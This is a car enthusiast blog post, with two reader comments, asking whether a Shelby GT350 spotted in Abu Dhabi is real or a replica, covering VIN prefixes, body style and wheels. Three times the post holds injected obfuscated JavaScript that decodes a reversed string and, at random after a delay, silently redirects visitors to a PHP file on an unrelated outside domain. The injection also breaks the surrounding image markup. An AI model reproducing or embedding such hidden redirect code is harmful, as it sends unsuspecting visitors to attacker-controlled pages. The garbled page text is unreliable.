Shelby GT350: Real or Fake?

Whilst driving through Abu Dhabi a couple of months ago this little puppy caught me eye from the side of the road. Now an old skool Mustang is always worth a look however this one had a distinct look even from 500 yards.

The first generation of Mustang made its way into the world in 1964 based on the pedestrian Ford Falcon it managed to sell every time they could build and really put the hurt on the GM and Chrysler. It was a decent car however it was in no way a sports car. So, to cut long story short Carol Shelby was contacted to the turn the “secretaries” car into a fire breathing monster..

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Shelby/IMG_6281.jpg” alt=”www.crankandpiston.com” width=”728″ border=”0″>

After his engineers got a hold of it the car would go on to become unbeatable in B/Production racing in the US and then later around the world.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Shelby/IMG_6286.jpg” alt=”www.crankandpiston.com” width=”728″ border=”0″>

So I suppose the question is as there was only 562 of these bad boys made what was one doing sat forlornly on the streets of AD? Or is it a fake?

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston/phil/Shelby/IMG_6285.jpg” alt=”www.crankandpiston.com” width=”728″ border=”0″>

The give aways for the real car is the glass front apron and the lack of rear bumpers – but that could be faked right?

The one and only true give away is the chassis number – All Shelby cars VIN numbers start with SFM (Shelby Ford Mustang), and I’ve got that picture saved away on my Mac. Reason? Go and have a look at the book “Million Dollar Muscle Cars” and see which car sits in there…

  1. Now, unless it is one of the ‘carry over’ 1965 models of which there were only 252 (and you’d be able to tell by looking under the bonnet – the carry over cars had black painted blocks whilst all other Shelby cars’ blocks were blue), I suspect that the car is not the real deal. According to my research, all Shelby GT350 and 500 models were fastbacks, not the notchbacks shown in the picture.

    The wheels are not original either.

    Your anorakingly,

    Fraser

  2. So your saying it’s real?, I only thought Shelby’s where fastbacks. It does seem to have the ducts in the rear fenders opened which would indicate Shelby. The rear quarter windows should not open I think on a real Shelby. I saw a black/gold 350H (Hertz) in Beirut a couple of weeks ago which I think we real.
